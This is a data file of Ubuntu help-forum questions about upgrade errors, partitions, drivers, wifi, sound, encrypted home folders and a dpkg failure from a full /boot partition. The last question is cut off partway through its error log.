333676	apt-get update fails after upgrade	i just updated my ubuntu from 12 to 13 doing : apt-get update ... apt-get upgrade next time , i should probably simply use instead : apt-get dist-upgrade my current version now is : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring when i tried to update the system gives me the error : apt-get update e : type ‘sudo’ is not known on line 64 in source list /etc/apt/sources.list e : the list of sources could not be read . so i did a purge : ppa-purge -purge * updating packages lists e : type ‘sudo’ is not known on line 64 in source list /etc/apt/sources.list e : the list of sources could not be read . warning : apt-get update failed for some reason ppa to be removed : * urge warning : could not find package list for ppa : * urge went to sources : cd /etc/apt ls apt.conf.d sources.list.d trustdb.gpg trusted.gpg.d preferences.d sources.list.distupgrade trusted.gpg sources.list sources.list.save trusted.gpg~ ls . * . : apt.conf.d sources.list.d trustdb.gpg trusted.gpg.d preferences.d sources.list.distupgrade trusted.gpg sources.list sources.list.save trusted.gpg~ .. : acpi logrotate.conf adduser.conf logrotate.d adjtime lsb-base akonadi lsb-base-logging.sh alternatives lsb-release anacrontab ltrace.conf apg.conf lvm apm macfanctl.conf apparmor magic apparmor.d magic.mime apport mailcap apt mailcap.order aptdaemon manpath.config at.deny matchbox at-spi2 mime.types avahi mke2fs.conf bash.bashrc modprobe.d bash_completion modules bash_completion.d motd bindresvport.blacklist mtab blkid.conf mtab.fuselock blkid.tab mtools.conf bluetooth mysql brlapi.key nanorc brltty netscsid.conf brltty.conf network ca-certificates networkmanager ca-certificates.conf networks ca-certificates.conf.dpkg-old newt calendar nsswitch.conf chatscripts obex-data-server checkbox.d odbcdatasources colord.conf odbc.ini compizconfig odbcinst.ini consolekit openal console-setup openvpn cracklib opt cron.d os-release cron.daily pam.conf cron.hourly pam.d cron.monthly papersize crontab passwd cron.weekly passwd- crypttab pcmcia cups perl cupshelpers pkcs11 dbus-1 pm debconf.conf pnm2ppa.conf debian_version polkit-1 default popularity-contest.conf deluser.conf ppp depmod.d printcap dhcp profile dhcp3 profile.d dictionaries-common protocols dkms pulse dnsmasq.d purple doc-base python dpkg python2.7 drirc python3 emacs python3.2 environment python3.3 firefox qemu fonts qemu-ifdown foomatic qemu-ifup foremost.conf rc0.d fstab rc1.d fstab.d rc2.d fuse.conf rc3.d gai.conf rc4.d gconf rc5.d gdb rc6.d ghostscript rc.local gimp rcs.d gnome remote-login-service.conf gnome-app-install resolvconf gnome-settings-daemon resolv.conf groff rmt group rpc group- rsyslog.conf grub.d rsyslog.d grub.d.bak samba gshadow sane.d gshadow- securetty gtk-2.0 security gtk-3.0 selinux hdparm.conf sensors3.conf host.conf sensors.d hostname services hosts sgml hosts.allow shadow hosts.deny shadow- hp shells icedtea-web signond.conf ifplugd signon-ui init skel init.d snmp initramfs-tools speech-dispatcher inputrc ssh insserv ssl insserv.conf subversion insserv.conf.d sudoers iproute2 sudoers.d issue sysctl.conf issue.net sysctl.d java-6-openjdk systemd kbd terminfo kde4 thunderbird kde4rc timezone kernel ucf.conf kernel-img.conf udev kerneloops.conf udisks2 kernel-pkg.conf ufw ksysguarddrc updatedb.conf kubuntu-default-settings update-manager kvm update-motd.d ldap update-notifier ld.so.cache upower ld.so.conf upstart-xsessions ld.so.conf.d usb_modeswitch.conf legal usb_modeswitch.d libaudit.conf vim libnl-3 vtrgb libpaper.d wgetrc libreoffice wodim.conf lightdm wpa_supplicant lintianrc x11 locale.alias xdg localtime xml logcheck xul-ext login.defs zsh_command_not_found as suggested , here is my sources.list : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //au.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //au.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //au.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //au.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //au.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //au.archive.ubuntu.com/ubuntu/ raring universe deb http : //au.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //au.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //au.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //au.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //au.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main # # for argouml # deb http : //archive.getdeb.net/ubuntu/ oneiric-getdeb apps # disabled on upgrade to raring deb http : //archive.canonical.com/ lucid partner deb-src http : //archive.canonical.com/ lucid partner # command line editor ( nano ) sudo -e /etc/apt/sources.list # graphical editor gksu gedit /etc/apt/sources.list could anyone shed some light on it ? before upgrading , this problem did not exist . i run my ubuntu on a mac mini dual boot . it is meant to software development and client-server usage . another machine , a laptop acer running mint , i tried to upgrade it but mint does not allow you to upgrade from one distro release for the next , without a clean install . we also tried several tests with some other *nix flavours : freebsd , openbsd , centos , fedora ... and it came to a conclusion that ubuntu looks to be the best option for a practical enterprise environment , with a good wide support for a large range of drivers , working also nicely both on refit/refind or grub multi-booting . should i never upgrade ubuntu desktop from current distro to the next ? unless it is a ubuntu lts ? so , is it the case that every new ubuntu distro release requires a clean new install ? all comments and suggestions are highly appreciated .
333679	ubuntu can not detect partitions	i have one hard disk on my computer . i had installed windows 7 on partition c. i installed ubuntu 12.04 64-bit on partition d and formatted the partition c because i did n't want it any more . now i want to see the partition c on ubuntu , but i ca n't . please help ! i have 300 gb of hard disk , but i can see 26 gb of my hard drives only . output of sudo fdisk -l : device boot start end blocks id system -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sda1 * 2048 391167 194560 83 linux /dev/sda2 393214 31301631 15454209 5 extended /dev/sda5 393216 6250495 2928640 82 linux swap / solaris /dev/sda6 6252544 17969151 5858304 83 linux /dev/sda7 17971200 31301631 6665216 83 linux
333685	better solution to a wrong md5 checksum	sometimes , while downloading the iso installation file , it may get corrupted on the way and becomes unfit for use . one possible solution that i know to deal with this problem is re-downloading the entire iso file again which is very difficult for users with low bandwidth . are there any alternative solutions which does not require the user to re-download the entire iso file ?
333695	signature not found in user keyring , perhaps try the interactive 'ecryptfs-mount-private '	my ubuntu 13.04 froze while working with the encrypted user account user1 . i rebooted and since then i cant login to the user account user1 even with correct password . i login in to user account user2 to get access to tty and login to user account user1 and i get the following error : signature not found in user keyring perhaps try the interactive 'ecryptfs-mount-private' ecryptfs-mount-private enter your login passphrase : inserted auth tok with sig [ xxxxxxxxxx ] into the user session keyring info : your private directory has been mounted info : to see this change in your current shell : user home path i then login to the user account user1 from the greeter login page . i always have to follow this procedure to login to the user account user1 . is there a way to insert the user keyring permanently ?
333698	ubuntu on acer aspire 5742g	i visited the list of laptops that support ubuntu on this website and none of the acer laptops was listed as supportive . so my question is : can i use ubuntu on my laptop ? - if so , which version should i choose so that all the features work ?
333707	how to download a link in links using axel/curl ?	shortly , how can i make lynx/links use axel/curl for downloading files that i want to store in my hard-disk ? ? longley : i 'm a server-manager and always used my ubuntu system and putty so i could copy/paste url with mouse and + : d but now i do n't have any graphical env . to use ; so i need a way to download files that i found to download using links/lynx via axel/curl . note that i have axel , curl , links and lynx installed on my both server and client machines and also i use ssh to access the text terminal . also i use bash for my default shell and have ( t ) csh , dash , and sh on both machines . also note that a way to export the exact link url to a text file could work because i still can tell axel/curl to download them with help of bash and python scripting . best regards !
333709	my laptop gets heated when i use ubuntu 13.04	i have a dell inspiron 14z 5423. intel i5 3rd , 4gb ram , 32gb ssd . i use 2 os on dual boot windows 8 & ubuntu 13.04 . when i use ubuntu my laptop gets heated , but that is not the case when i use windows 8 . why this happens ?
333710	how to find all files with the same extension within a directory	i am beginner in linux and i want to search for all .conf files in /etc/ . i tried grep -r *.conf /etc , but the result is n't the right one , what i am doing wrong .
333711	how to connect to the internet during ubuntu 13.04 installation via thomson speedtouch 510i dsl modem ?	i want to use ubuntu in a dual-boot environment besides windows7 x64 . dsl internet connection via windows works fine , but i can not setup the connection in ubuntu . i 've tried 'sudo pppoeconf ' with the result 'access concentrator does not respond ' . i 've also tried setting up the connection manually in the network manager ( eth0 + vpn ) , but that does n't work either . i 've got as far as 'network connected ' and 'vpn connected ' , but there 's no internet access . i 'm a linux noob ( i 've just tried suse 7.x for a short time many years ago without network ) but otherwise a c64 and ms-dos veteran , still the ubuntu network/internet setup makes me feel like a complete idiot . please help .
333717	ubuntu 12.04.02 filesystem	i am about to install ubuntu 12.04.02 desktop on my home pc . can somebody please tell me what is the default file system for ubuntu 12.04.02 , is it ext3 or ext4 ?
333718	how can i find out my user name ?	how do i know my username ? i 've installed ubuntu , but i do n't know my username , only my password . i ca n't access my laptop and it ca n't be opened .
333719	how to connect to oracle 11g with sql developer : vevndor code 17410 ?	yesterday i have installed oracle 11g on ubuntu 12.04 lts according to post . i can connect to database using sql*plus . however when i try to connect using oracle sql developer i get error ( with this sid : plsextproc . ) no more data to read from socket vendor code 17410 i have switched in tnsnames.ora line server=dedicated to server=shared and then restarted database , but it did not help . does anybody have suggestions ?
333720	firefox very slow	i am running firefox 23.0 on ubuntu 13.04 ( 64-bit ) and it is a real pain at the best of times . it takes around 45 seconds to have a usable window after i click on firefox in the launcher : 15-20 seconds for a window to show , and then 25-30 seconds of a blank window before it is usable . many web-pages that i use regularly cause firefox to freeze up for around 10-20 seconds before it is usable again . i first thought there was just a bug in firefox 21/22 , so i waited a few versions before speaking up . i installed a clean ubuntu 13.04 a month or two ago . in comparison , libreoffice and gimp are both usable within 10 seconds after i click on them . the problem does not , therefore , seem to be hardware-related . i would appreciate any help ! just please do n't tell me to switch to chrome/ium . firefox worked perfectly on ubuntu 12.10 before i clean-installed ubuntu 13.04 .
333726	how to creat a symbolic link to all files with a specific extension from a specific directory using a shell script ?	i tried the following code , but i 'm missing something somewhere . i want to create a symbolic link to all *.conf files from /etc/ in /root/links # ! /bin/bash for conf in /etc/ do ln -s `` $ conf '' `` /root/links/ $ conf '' done
333732	sound problems in ubuntu 13.04 ( 64bit )	yesterday i installed ubuntu 13.04 ( 64bit ) on my computer ( i used to have windows ) when i logged in into my `` account '' ( when the computer powered on ) i noticed that i do n't have sound . i made some searches in google to check the problem , i tried everything i saw but nothing happened . i have : mio on ear headphones what can i do ? ( first time on ubuntu so if you can make the explanation easier for me )
333733	screen turns blank while installing ubuntu 12.04 from a dvd	when i try to install ubuntu 12.04 by dvd , i insert the dvd and select the booting option as dvd . next i press the enter key to install . after few seconds my screen goes blank like when the computer is turned off . during this blank screen there are quiet sounds of disk writing for about 15 to 20 minutes from the dvd writer , after this the sound stops . my computer is on but the screen remains blank . please help me install ubuntu on my system . my system configuration is -- hp pavilion g4 ram 4 gb hard disk 640 gb processor intel i5 operating system is windows 7 home basic 64 bit .
333734	website + ldap + teampass , how to configure ?	got a small issue using my web server where i host a teampass website ( http : //www.teampass.net ) . i am using ubuntu 13.04 server and installed lamp and i have a windows 2008 r2 with active directory running . i ca n't get the ldap authentication working . i am sure i have missed something but can really figure it out ... my ubuntu server is not joined in the domain , and i guess i have to set some log in credentials to connect to my w2k8-server/ad ... but where ? i ca n't find anywhere in the teampass settings to add the login details . need some help here .
333740	enabling superspeed for usb3 ports ?	hi i recently bought an usb3 external hdd . to my surprise when transferring files from my laptop ( ubuntu 12.04 installed ) to this hdd ( connected to a usb3 port using an usb3 cable ) , the speed is exactly the same that i get with other usb2 devices . is there a way to check if the usb3 super speed is enabled ? do i need to load some kernel modules at boot ? how can i make the transfer rate increase ? lsusb -v and dmesg .
333742	not able to connect to wifi , using wl driver , having already blacklisted bcma and brcmsmac ( bcm4313 )	i have the broadcom 4313 [ 14e4:4727 ] wireless interface and my laptop is lenovo z580 running ubuntu 12.04 . the output of lspci -k | grep wl , gives kernel driver in use : wl kernel modules : wl , bcma , brcmsmac i have blacklisted bcma and brcmsmac in /etc/modprobe.d/blacklist.conf and under /etc/modules , i have added wl . wl used to work fine originally , but after an update , brmcsmac got pushed to my system . since that i have been trying everything possible to get my wifi working , to no avail . i have tried disabling wl and using brcsmac , but that does not help as well . if anybody has an idea to fix this , kindly suggest .
333743	enable login to linux machine using picture password	is there any program to enable login to a linux machine using picture password like in windows 8 ? if so , what is it ?
333749	why firefox menu button disappeared ?	i 'm using the latest stable firefox under ubuntu 13.04 x64 . i disabled menu bar , because using the menu button is more comfortable for me . until an update ( around version 21 or 22 ) the button just disappeared . i checked the tool bar settings but those are correct , so nothing has been changed . i purged firefox and removed the cache , but it is still the same . but i noticed an exception : if i run firefox with sudo , the menu button appears . i 'm talking about this little thing what i miss . how can i get it back permanently ?
333751	blender 2.68 wonât start	i just downloaded blender 2.68 from www.blender.org and 2.68.2 ( fedora 19 ) from www.graphicall.org . i unpacked each and double-clicked the `` blender '' - application . however , nothing happens . how can i run blender ? i installed blender 2.62 via software-center and it worked fine , but i really want to use version 2.68 . i am using ubuntu 12.04 lts . i’m still new to ubuntu .
333752	add or remove a program in sound menu in ubuntu 12.04	i had rhythm box in sound menu which come along with ubuntu 12.04 . in order to have good playlist option i moved to clementine music player . after installing clementine in the system , sound menu has both the player option . i tried choosing the default player as clementine in settings . but it do not change anything . problem is when i try to play any music by selecting inside clementine music player . rhythm box also started playing the same music . i guess removing the rhythm box in sound menu may solve the problem . please help how to remove or add any app into sound menu in ubuntu 12.04
333758	unable to mount the windows drive on which windows 8 is installed	i had windows 8 installed on my pc.i recently installed ubuntu 13.04 . i am unable to access the c drive of windows 8 on which windows 8 is installed.i can access the rest of the drives fine.but whenever i try to access the windows 's c drive in ubuntu , i get below error . error mounting /dev/sda5 at /media/vinay/d4e68006e67fe760 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/vinay/d4e68006e67fe760 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . disabled fast startup too.but no use .
333761	hyperthreading on 32-bit but not on 64-bit ?	i have a strange situation . i have two computers with identical hardware , both core i5 , exactly the same model . the only difference is the os , one has 12.04 32-bit and the other one has 12.04 64-bit . the problem is that hyperthreading is only enabled on the 32-bit os and not on the 64-bit os . can you tell me why , and how i can enable it ? i looked in the bios and both have exactly the same settings , both hyperthreading enabled in bios but not in the os . 2 logical processors : architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 2 on-line cpu ( s ) list : 0,1 thread ( s ) per core : 1 core ( s ) per socket : 2 socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 42 stepping : 7 cpu mhz : 2294.665 bogomips : 4589.73 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 256k l3 cache : 3072k numa node0 cpu ( s ) : 0,1 4 logical processors : architecture : i686 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 4 on-line cpu ( s ) list : 0-3 thread ( s ) per core : 2 core ( s ) per socket : 2 socket ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 42 stepping : 7 cpu mhz : 800.000 bogomips : 4589.36 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 256k l3 cache : 3072k
333766	retrieve files from ubuntu live usb	i am new to ubuntu and i would like to ask how could i retrieve files that saved on my ubuntu live usb . in other words , when i was working on ubuntu live usb i download files pdf , zip , etc , am asking how can i retrieve these files to access them on my windows machine . thanks a lot
333768	the purpose of updating after adding a ppa repository	when adding a ppa repository using sudo add-apt-repository ppa : ... , why should i execute sudo apt-get update ? i am new to ubuntu and i do n't see the purpose of it because there are n't packages installed from the repo . it only takes a lot of time to cycle through my installed packages .
333771	create a shortcut to a folder on the desktop 13.04	i am looking to create a shortcut either in the explorer or on my desktop to the /host/users/harry/ folder so i can access my windows partition easily , it is a hassle to go through the filesystem each time
333773	disable `` show position of the mouse when the control key is pressed '' in 13.04	in version 12.10 there was a setting under system settings > mouse & touchpad to `` show position of the mouse when the control key is pressedâ . while using 12.10 i enabled this option . i have since upgraded to version 13.10 , and this setting appears to have disappeared . how can i now disable this ? it is interfering with the use of the control key in a number of apps , such as virtualbox . i 'm quite happy to use the terminal or edit a settings file if that is the best ( only ) way to do this . i really ( ! ! ) do n't want to have to reinstall just to reset this one option .
333778	deleted photos in my camera	i have accidentally deleted some photos from my camera and than found out , that those photos were really precious to my girlfriend . i tried googling and both windows and linux tools to recover those files but no result . the problem is , that when i plug in my camera i is mounted to /run/user/jendas/gvfs and mount says : gvfsd-fuse on /run/user/jendas/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=jendas ) so i can not access my files with the tools i tried cause they always need something like /sda ... please is there any way around ? i do n't wan na die : - ( edit : just to be clear , i do not really think , that path to my camera will be /dev/sda ... i checked every location marked as fuseblk in corresponding mount directory and the camera is not there . here is what gives mount : /dev/sda5 on / type ext4 ( rw , noatime , nodiratime , discard , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) gvfsd-fuse on /run/user/jendas/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=jendas ) /dev/sdb1 on /media/jendas/rezervovăąno systăšmem type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb2 on /media/jendas/ee2ac63d2ac60317 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb6 on /media/jendas/099218f3-ad22-4022-900f-c39b98049fdf type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sdb4 on /media/jendas/data type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda2 on /media/jendas/b4aed817aed7d04a type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) my camera is here listed as line , that i have already typed above . final edit : finally i have recovered the pictures ! so i wo n't be destroyed by mighty and terrifying feminine look . i the end i solve the problem by removing the memory card from camera and plugging it into another notebook with working memory card reader . than i followed the standard procedure . i wonder , that my problems were probably caused by the camera it self and its firmware . i think that it handles the usb connection in some non-standard and creepy way so the kernel ca n't it properly identify as external removable drive . so thank you all anyway and have a good day . ps : i will accept the original answer posted lower because it helped me solve at least part of the problem : - )
333781	ca n't resume after hibernation	i tried to hibernate using pm-hibernate but when i start ubuntu again i ca n't get to login screen.but when i tried to login lightdm keeps restarting and keeping me from login . please help me ? i 'm new to ubuntu . sudo startx fetal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again ddsigngiveup : closing log invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 keyxinit : giving up xinit : unable to connect to x server : resource temporarily unavaliable xinit : server error
333782	dual boot with wubi installer - reinstalling windows	i have installed ubuntu using a windows installer - wubi - as a dual boot with windows 7 . now i would like to reinstall windows 7 . is there any chance to retain ubuntu ? any tweak available to make it as direct boot ?
333783	vim editor , how can i save a file in other directory	i 'm new in the world of ubuntu and vim editor . my question is : how can i save a file on my localhost using vim ? when i use the command : w i save the file , but where ? and how can i change the file location to /var/www/ ?
333786	what is a makefile exactly and how we can create one ?	i know this is a silly question , but since i am trying so hard to learn linux by myself , i need some help from you fellows . i found this task on the internet and i am trying to solve it but i do n't understand exactly how can i use makefiles in linux and how can i create them . let 's suppose my print working directory is /home/george/documents i want to create a makefile which does the following : displays a message as follows `` hello work , today is sun '' . sun comes from sunday . so i must use date command in this make file to display just first three letters . compress /etc/hosts in /tmp using gzip ( probably here should be something like gzip -c source destination # ? ? cheers
333795	what are the system requirements for each flavour of ubuntu desktop	i 'm thinking about installing ubuntu desktop , but i do n't know what flavor is the better for my system . what are the minimum and recommended hardware requirements ? what kind of cpu ? how much memory ? should i have hardware acceleration ? what flavor should i use ? this is an attempt of a canonical answer . my answers have the `` official requirements '' , the recommended are a mix of official sources and opinion based ( along with the answer it 's told the source ) . you can comment or edit if you feel that the information is obsolete or incomplete . is a good rule of thumb that any system capable to run windows vista , 7 , 8 x86 os x will almost always be a lot faster with any ubuntu flavor even if they are lower-spec than described below .
333804	setting up websites with ubuntu 13.04 server and nginx	i 'm trying to setup 2 websites on my server -- - > a_website and b_website i do n't have a domain name registered and i just want to use the site privately so i 'll be accessing it via the static ip address that my isp gave me . i have installed a fresh ubuntu 13.04 server and i have installed fresh nginx + php + mysql by referencing from the following website . how do i go about setting/configuring my nginx so that i can access my websites by typing the following in the browser url box : my.isp.address/a_website/index.html and my.isp.address/b_website/index.html ? currently it 's still pointing to the default nginx site folder /usr/share/nginx/html/ .
333808	how to create command line application in eclipse ( c++ or java ) ?	how to create command line application c++ or java ? i have some commands which i would like to convert into an application . how to do it in eclipse ? just for example consider : sudo apt-get upgrade xyz i want to get it into ubuntu repository . or i 'll create a gui using qt with c++ or java plugin .
333816	why is $ path used as a variable ?	could n't there be a config text file instead ?
333819	about intel 82865g	well i think this is already been asked but any of those questions did not answer me . my computer , a hp d260 mt brand machine has the following specs : pentium 4 processor @ 3.0 ghz on-board intel 82865g graphics controller @ 96mb 1 gb ram i have seen many telling that with their intel 82865g graphics they are able to run ubuntu 13.04 but i tried ubuntu 11.04 on my computer last year and its desktop screen was not showing and unity was not working please help me .
333822	downloading from kickass	trying to download a torrent with magnet link can not get this to work with q bit torrent and firefox , please help i am new to linux
333823	error installing ubuntu using wubi	i am new to the community and would love to try out ubuntu . i chose to install it using wubi to save the pain of reformatting etc . i have now tried the installer several times using different partitions but i get an error . here is part of the log file : traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 463 , in expand_diskimage file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=c : \docume~1\arish'~1\locals~1\temp\pyl336.tmp\bin\resize2fs.exe -f c : \ubuntu\disks\root.disk 17744m > > retval=1 > > stderr= > > stdout=resize2fs 1.40.6 ( 09-feb-2008 ) usage : /cygdrive/c/docume~1/arish~1/locals~1/temp/pyl336.tmp/bin/resize2fs.exe -f c : /ubuntu/disks/root.disk 17744m [ -d debug_flags ] [ -f ] [ -f ] [ -p ] device [ new_size ]
333825	faster screen capture	good day everyone , i use screen capture utilities to create anki study flash cards . i have been using the shutter application with the `` selection '' option which allows me to drag the capture region and save it to the clipboard . unfortunately it is slow.after hitting the the capture hotkey or selection the option here is a delay for 1 - 2 seconds . i have edited the preferences to ensure there is no delay set . can anyone tell me why this is happening / and or recommend another fast screen capture utility that allows me to choose a capture selection and have it sent to the clipboard ? currently using ubuntu 13 .
333834	what 's the downside of choosing < yes > in resolvconf 's configuration dialog ?	an automatic restart by its windows host has somehow messed up my ubuntu ( 12.04 lts ) virtualbox 's resolvconf . ( for one thing , /etc/resolv.conf is gone . ) therefore , i ran % sudo dpkg-reconfigure resolvconf ... upon which i am presented with the following dialog : the resolvconf package contains the infrastructure required for dynamic updating of the resolver configuration file . part of the necessary infrastructure is a symbolic link from /etc/resolv.conf to /run/resolvconf/resolv.conf . if you choose this option then this link will be created ; the existing /etc/resolv.conf file will be preserved as /etc/resolvconf/resolv.conf.d/original , and will be restored if this package is removed . declining this option will prevent future installations from recreating the symbolic link and therefore the resolver configuration file will not be dynamically updated . dynamic updating can then be activated following instructions in the readme file . the presence of resolvconf can affect the behavior of other programs , so it should not be left installed if unconfigured . prepare /etc/resolv.conf for dynamic updates ? < yes > [ < no > ] ( note that the option is the one selected by default . ) my question is : can someone explain to me what are the downsides to choosing < yes > ? ( i understand the downsides to choosing < no > , but i do n't see the downsides to choosing < yes > , though i have to assume there are such downsides , otherwise it 's hard to understand why i 'd be given the choice in the first place . )
333844	os selection option in grub goes in a flash	i am using ubuntu 12.04 and windows 7 in dual boot.recently a problem started to occur , sometimes when i switch on my laptop the grub screen to select the os comes and goes in a flash wwithout giving me any time to switch os.apart from that whenever this happens the splash screen of ubuntu flickers with alternate flash screen and some text screen and keeps flickering without booting in.how can i fix this ?
333849	how to copy files from swap space ?	i 'm a newbie to ubuntu . when i was trying to install ubuntu 12.04 on my laptop , i chose one of major partitions ( 60g ) which contains lots of important files as a swap space . after completing the system installation , i found i had no access to all my files in that partition . that really makes me frustrated . can someone tell how to copy or recover my files from that partition . thank you very much !
333850	how to install whatsapp ?	please tell me how to install whatsapp in ubuntu ? i have heard of wine . can you guys please clarify ? related : how to use whatsapp mobile application on ubuntu touch ?
333859	trouble installing or removing software	i am new to linux , and i keep encountering problems when i try to install or remove software . does anyone happen to know what the problem is ? the errors read : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 348502 files and directories currently installed . ) removing libreoffice-base ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for mime-support ... setting up linux-image-3.8.0-25-generic ( 3.8.0-25.37 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.8.0-26-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic update-initramfs : generating /boot/initrd.img-3.8.0-25-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-25-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-25-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already setting up linux-image-3.8.0-26-generic ( 3.8.0-26.38 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.8.0-25-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-26-generic /boot/vmlinuz-3.8.0-26-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-26-generic /boot/vmlinuz-3.8.0-26-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-26-generic /boot/vmlinuz-3.8.0-26-generic update-initramfs : generating /boot/initrd.img-3.8.0-26-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-26-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-26-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-26-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already setting up linux-image-3.8.0-27-generic ( 3.8.0-27.40 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.8.0-26-generic examining /etc/kernel/postinst.d . run-parts : executing 